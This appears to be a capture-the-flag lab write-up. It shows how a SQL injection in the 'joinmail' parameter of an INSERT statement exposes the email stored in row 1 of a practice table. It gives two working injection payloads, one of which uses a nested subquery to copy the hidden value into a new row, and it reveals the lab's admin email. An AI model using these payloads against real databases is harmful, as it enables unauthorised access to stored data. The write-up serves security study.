![](https://niekdang.wordpress.com/wp-content/uploads/2020/05/image-64.png?w=1024)
In this lab, we need to find the value of email
with no=1
, so we will duplicate it with insert statement.
We can insert multiple rows at once, to test this, we use the payload:
?joinmail=a'),+(2,'14.248.83.2','aa')#
![](https://niekdang.wordpress.com/wp-content/uploads/2020/05/image-67.png?w=711)
It worked. Then we just need to change 'aa'
value into the email. But MySQL does not allow you to directly insert data from one table to itself, we will change the payload a little.
?joinmail=b'),+(3,'14.248.83.2',(select+email+from+(select+email+from+prob_phantom+where+no=1)+as+a))#
![](https://niekdang.wordpress.com/wp-content/uploads/2020/05/image-68.png?w=1024)
Then, we find the email
with no=1
.
admin_secure_email@rubiya.kr
![](https://niekdang.wordpress.com/wp-content/uploads/2020/05/image-66.png?w=253)